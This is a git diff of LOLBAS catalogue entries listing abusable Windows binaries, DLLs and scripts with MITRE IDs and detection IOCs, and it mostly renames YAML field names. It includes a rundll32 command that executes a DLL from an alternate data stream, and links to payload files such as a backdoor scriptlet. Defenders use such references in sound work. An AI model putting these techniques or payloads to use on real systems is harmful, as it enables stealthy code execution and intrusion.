Full_Path:
|
||||||
- Path: C:\Windows\System32\regsvcs.exe
|
- Path: C:\Windows\System32\regsvcs.exe
|
||||||
- Path: C:\Windows\SysWOW64\regsvcs.exe
|
- Path: C:\Windows\SysWOW64\regsvcs.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -36,10 +36,10 @@ Commands:
|
|||||||
MitreID: T1117
|
MitreID: T1117
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1117
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1117
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\regsvr32.exe
|
- Path: C:\Windows\System32\regsvr32.exe
|
||||||
- Path: C:\Windows\SysWOW64\regsvr32.exe
|
- Path: C:\Windows\SysWOW64\regsvr32.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: regsvr32.exe getting files from Internet
|
- IOC: regsvr32.exe getting files from Internet
|
||||||
|
@ -20,10 +20,10 @@ Commands:
|
|||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\replace.exe
|
- Path: C:\Windows\System32\replace.exe
|
||||||
- Path: C:\Windows\SysWOW64\replace.exe
|
- Path: C:\Windows\SysWOW64\replace.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Replace.exe getting files from remote server
|
- IOC: Replace.exe getting files from remote server
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1003
|
MitreID: T1003
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\rpcping.exe
|
- Path: C:\Windows\System32\rpcping.exe
|
||||||
- Path: C:\Windows\SysWOW64\rpcping.exe
|
- Path: C:\Windows\SysWOW64\rpcping.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -47,7 +47,7 @@ Commands:
|
|||||||
- Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
|
- Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
|
||||||
Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
|
Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
|
||||||
Usecase: Execute code from alternate data stream
|
Usecase: Execute code from alternate data stream
|
||||||
Category: Alternate data streams
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1096
|
MitreID: T1096
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||||
@ -60,10 +60,10 @@ Commands:
|
|||||||
MitreID:
|
MitreID:
|
||||||
MitreLink:
|
MitreLink:
|
||||||
OperatingSystem: Windows 10 (and likely previous versions)
|
OperatingSystem: Windows 10 (and likely previous versions)
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\rundll32.exe
|
- Path: C:\Windows\System32\rundll32.exe
|
||||||
- Path: C:\Windows\SysWOW64\rundll32.exe
|
- Path: C:\Windows\SysWOW64\rundll32.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\runonce.exe
|
- Path: C:\Windows\System32\runonce.exe
|
||||||
- Path: C:\Windows\SysWOW64\runonce.exe
|
- Path: C:\Windows\SysWOW64\runonce.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY
|
- IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
|
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
|
||||||
- Path: CC:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
|
- Path: CC:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Event 4014 - Powershell logging
|
- IOC: Event 4014 - Powershell logging
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1096
|
MitreID: T1096
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\sc.exe
|
- Path: C:\Windows\System32\sc.exe
|
||||||
- Path: C:\Windows\SysWOW64\sc.exe
|
- Path: C:\Windows\SysWOW64\sc.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Services that gets created
|
- IOC: Services that gets created
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1053
|
MitreID: T1053
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1053
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1053
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\schtasks.exe
|
- Path: c:\windows\system32\schtasks.exe
|
||||||
- Path: c:\windows\syswow64\schtasks.exe
|
- Path: c:\windows\syswow64\schtasks.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Services that gets created
|
- IOC: Services that gets created
|
||||||
|
@ -20,10 +20,10 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\scriptrunner.exe
|
- Path: C:\Windows\System32\scriptrunner.exe
|
||||||
- Path: C:\Windows\SysWOW64\scriptrunner.exe
|
- Path: C:\Windows\SysWOW64\scriptrunner.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Scriptrunner.exe should not be in use unless App-v is deployed
|
- IOC: Scriptrunner.exe should not be in use unless App-v is deployed
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe
|
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe
|
||||||
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
|
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed
|
- IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\verclsid.exe
|
- Path: C:\Windows\System32\verclsid.exe
|
||||||
- Path: C:\Windows\SysWOW64\verclsid.exe
|
- Path: C:\Windows\SysWOW64\verclsid.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Program Files\Windows Mail\wab.exe
|
- Path: C:\Program Files\Windows Mail\wab.exe
|
||||||
- Path: C:\Program Files (x86)\Windows Mail\wab.exe
|
- Path: C:\Program Files (x86)\Windows Mail\wab.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: WAB.exe should normally never be used
|
- IOC: WAB.exe should normally never be used
|
||||||
|
@ -68,10 +68,10 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\wmic.exe
|
- Path: C:\Windows\System32\wmic.exe
|
||||||
- Path: C:\Windows\SysWOW64\wmic.exe
|
- Path: C:\Windows\SysWOW64\wmic.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Wmic getting scripts from remote system
|
- IOC: Wmic getting scripts from remote system
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1096
|
MitreID: T1096
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\wscript.exe
|
- Path: C:\Windows\System32\wscript.exe
|
||||||
- Path: C:\Windows\SysWOW64\wscript.exe
|
- Path: C:\Windows\SysWOW64\wscript.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Wscript.exe executing code from alternate data streams
|
- IOC: Wscript.exe executing code from alternate data streams
|
||||||
|
@ -20,10 +20,10 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\xwizard.exe
|
- Path: C:\Windows\System32\xwizard.exe
|
||||||
- Path: C:\Windows\SysWOW64\xwizard.exe
|
- Path: C:\Windows\SysWOW64\xwizard.exe
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
@ -38,5 +38,5 @@ Acknowledgement:
|
|||||||
- Person: Nick Tyrer
|
- Person: Nick Tyrer
|
||||||
Handle: '@NickTyrer'
|
Handle: '@NickTyrer'
|
||||||
- Person: harr0ey
|
- Person: harr0ey
|
||||||
Handle: @harr0ey
|
Handle: '@harr0ey'
|
||||||
---
|
---
|
||||||
|
@ -42,10 +42,10 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1085
|
MitreID: T1085
|
||||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\advpack.dll
|
- Path: c:\windows\system32\advpack.dll
|
||||||
- Path: c:\windows\syswow64\advpack.dll
|
- Path: c:\windows\syswow64\advpack.dll
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf
|
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf
|
||||||
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct
|
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct
|
||||||
Detection:
|
Detection:
|
||||||
|
@ -42,10 +42,10 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1085
|
MitreID: T1085
|
||||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\ieadvpack.dll
|
- Path: c:\windows\system32\ieadvpack.dll
|
||||||
- Path: c:\windows\syswow64\ieadvpack.dll
|
- Path: c:\windows\syswow64\ieadvpack.dll
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack.inf
|
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack.inf
|
||||||
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack_calc.sct
|
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack_calc.sct
|
||||||
Detection:
|
Detection:
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1085
|
MitreID: T1085
|
||||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\ieframe.dll
|
- Path: c:\windows\system32\ieframe.dll
|
||||||
- Path: c:\windows\syswow64\ieframe.dll
|
- Path: c:\windows\syswow64\ieframe.dll
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
|
- Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1085
|
MitreID: T1085
|
||||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\mshtml.dll
|
- Path: c:\windows\system32\mshtml.dll
|
||||||
- Path: c:\windows\syswow64\mshtml.dll
|
- Path: c:\windows\syswow64\mshtml.dll
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1085
|
MitreID: T1085
|
||||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\pcwutl.dll
|
- Path: c:\windows\system32\pcwutl.dll
|
||||||
- Path: c:\windows\syswow64\pcwutl.dll
|
- Path: c:\windows\syswow64\pcwutl.dll
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
@ -25,3 +25,4 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Matt harr0ey
|
- Person: Matt harr0ey
|
||||||
Handle: '@harr0ey'
|
Handle: '@harr0ey'
|
||||||
|
---
|
@ -20,10 +20,10 @@ Commands:
|
|||||||
MitreID: T1085
|
MitreID: T1085
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\setupapi.dll
|
- Path: c:\windows\system32\setupapi.dll
|
||||||
- Path: c:\windows\syswow64\setupapi.dll
|
- Path: c:\windows\syswow64\setupapi.dll
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf
|
- Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf
|
||||||
- Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct
|
- Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct
|
||||||
- Code: https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor-Minimalist.sct
|
- Code: https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor-Minimalist.sct
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1085
|
MitreID: T1085
|
||||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\shdocvw.dll
|
- Path: c:\windows\system32\shdocvw.dll
|
||||||
- Path: c:\windows\syswow64\shdocvw.dll
|
- Path: c:\windows\syswow64\shdocvw.dll
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
|
- Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -26,10 +26,10 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1085
|
MitreID: T1085
|
||||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\shell32.dll
|
- Path: c:\windows\system32\shell32.dll
|
||||||
- Path: c:\windows\syswow64\shell32.dll
|
- Path: c:\windows\syswow64\shell32.dll
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -20,10 +20,10 @@ Commands:
|
|||||||
MitreID: T1085
|
MitreID: T1085
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\syssetup.dll
|
- Path: c:\windows\system32\syssetup.dll
|
||||||
- Path: c:\windows\syswow64\syssetup.dll
|
- Path: c:\windows\syswow64\syssetup.dll
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf
|
- Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf
|
||||||
- Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct
|
- Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct
|
||||||
- Code: https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415
|
- Code: https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415
|
||||||
|
@ -52,10 +52,10 @@ Commands:
|
|||||||
MitreID: T1085
|
MitreID: T1085
|
||||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\url.dll
|
- Path: c:\windows\system32\url.dll
|
||||||
- Path: c:\windows\syswow64\url.dll
|
- Path: c:\windows\syswow64\url.dll
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -20,10 +20,10 @@ Commands:
|
|||||||
MitreID: T1085
|
MitreID: T1085
|
||||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
MItreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\zipfldr.dll
|
- Path: c:\windows\system32\zipfldr.dll
|
||||||
- Path: c:\windows\syswow64\zipfldr.dll
|
- Path: c:\windows\syswow64\zipfldr.dll
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -12,11 +12,11 @@ Commands:
|
|||||||
MitreID: T1216
|
MitreID: T1216
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
|
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
|
||||||
- Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
|
- Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
|
||||||
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
|
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -12,11 +12,11 @@ Commands:
|
|||||||
MitreID: T1216
|
MitreID: T1216
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
|
- Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
|
||||||
- Path: C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1
|
- Path: C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1
|
||||||
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1
|
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -20,9 +20,9 @@ Commands:
|
|||||||
MitreID: T1216
|
MitreID: T1216
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\manage-bde.wsf
|
- Path: C:\Windows\System32\manage-bde.wsf
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Manage-bde.wsf should normally not be invoked by a user
|
- IOC: Manage-bde.wsf should normally not be invoked by a user
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1216
|
MitreID: T1216
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
Full Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
|
- Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
|
||||||
- Path: C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
|
- Path: C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
|
||||||
Code Sample:
|
Code_Sample:
|
||||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Pubprn_calc.sct
|
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSScripts/Payload/Pubprn_calc.sct
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC:
|
||||||
|
@ -12,10 +12,10 @@ Commands:
|
|||||||
MitreID: T1216
|
MitreID: T1216
|
||||||
